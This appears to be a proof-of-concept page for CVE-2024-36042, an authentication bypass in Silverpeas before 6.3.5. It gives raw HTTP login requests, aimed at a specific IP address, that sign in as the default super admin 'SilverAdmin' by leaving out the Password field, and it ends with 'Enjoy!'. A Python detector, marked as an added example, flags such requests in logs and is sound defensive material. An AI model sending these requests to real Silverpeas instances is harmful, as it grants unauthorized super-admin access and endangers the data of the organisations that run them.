CVE-2024-36042 PoC: Silverpeas security vulnerability

Source
Associated Vulnerability
Title: Silverpeas security vulnerability (CVE-2024-36042)
Description: Silverpeas before 6.3.5 allows authentication bypass by omitting the Password field to AuthenticationServlet, often providing an unauthenticated user with superadmin access.
Description
CVE-2024-36042 Silverpeas authentication bypass vulnerability #Silverpeas #vulnerability #authentication 
Readme
# CVE-2024-36042

## First, identify whether the version is vulnerable
All versions prior to 6.3.5 are vulnerable (i.e., version 6.3.4 and earlier). If the sender omits the Password form field, the application signs the sender in as the specified user without any challenge.

## The standard login request will look like this in Burp Suite:
```
POST /silverpeas/AuthenticationServlet HTTP/2
Host: 212.129.58.88
Content-Length: 49
Origin: https://212.129.58.88
Content-Type: application/x-www-form-urlencoded

Login=SilverAdmin&Password=SilverAdmin&DomainId=0
```

This login will fail (unless the default password was never changed), and you will be redirected back to the login page with an error code.

## But if you remove the password field like this:
```
POST /silverpeas/AuthenticationServlet HTTP/2
Host: 212.129.58.88
Content-Length: 28
Origin: https://212.129.58.88
Content-Type: application/x-www-form-urlencoded

Login=SilverAdmin&DomainId=0
```

Then the login attempt will (usually) succeed and redirect you to the main page, now logged in as a super admin.

![Alt text](https://github.com/zaaraZiof0/CVE-2024-36042/blob/main/evidance.png)

The bug works with any valid user, but SilverAdmin is the default super admin.
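
A defender-side check for the request pattern described above, as an added example that is not part of the original README: it classifies captured raw requests (for example from a reverse proxy or WAF audit log that records bodies) and flags posts to AuthenticationServlet that carry `Login` but no `Password` field. The function names, the sample requests and the host `silverpeas.example` are constructed for illustration.

```python
from urllib.parse import parse_qs, urlsplit

AUTH_PATH = "/silverpeas/AuthenticationServlet"  # endpoint named on this page

def classify_login_request(raw: str) -> str:
    """Return "not-auth", "normal" or "password-omitted" for one raw request."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n")[0].split()
    if len(parts) < 2 or parts[0].upper() != "POST":
        return "not-auth"
    target = urlsplit(parts[1])
    if target.path.rstrip("/") != AUTH_PATH:
        return "not-auth"
    # Servlet parameters can arrive in the query string or the form body,
    # so merge both. keep_blank_values=True makes an empty "Password="
    # count as a submitted field rather than as an omitted one.
    fields = parse_qs(target.query, keep_blank_values=True)
    fields.update(parse_qs(body.strip(), keep_blank_values=True))
    if "Login" in fields and "Password" not in fields:
        return "password-omitted"
    return "normal"

def flag_requests(captured: dict) -> list:
    """Names of captured requests that omit the Password field."""
    return [name for name, raw in captured.items()
            if classify_login_request(raw) == "password-omitted"]

# Constructed sample requests (not taken from any real system).
HDR = ("Host: silverpeas.example\r\n"
       "Content-Type: application/x-www-form-urlencoded\r\n\r\n")
SAMPLES = {
    "full_login": f"POST {AUTH_PATH} HTTP/1.1\r\n{HDR}"
                  "Login=alice&Password=correct-horse&DomainId=0",
    "no_password": f"POST {AUTH_PATH} HTTP/1.1\r\n{HDR}"
                   "Login=SilverAdmin&DomainId=0",
    "empty_password": f"POST {AUTH_PATH} HTTP/1.1\r\n{HDR}"
                      "Login=alice&Password=&DomainId=0",
    "password_in_query": f"POST {AUTH_PATH}?Password=x HTTP/1.1\r\n{HDR}"
                         "Login=alice&DomainId=0",
    "other_page": "GET /silverpeas/Login HTTP/1.1\r\n"
                  "Host: silverpeas.example\r\n\r\n",
}

if __name__ == "__main__":
    for name in flag_requests(SAMPLES):
        print("ALERT: login request without Password field:", name)
```

On an instance older than 6.3.5, a flagged request followed by a redirect to the main page rather than back to the login page is worth investigating as a possible unauthenticated sign-in.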

Enjoy!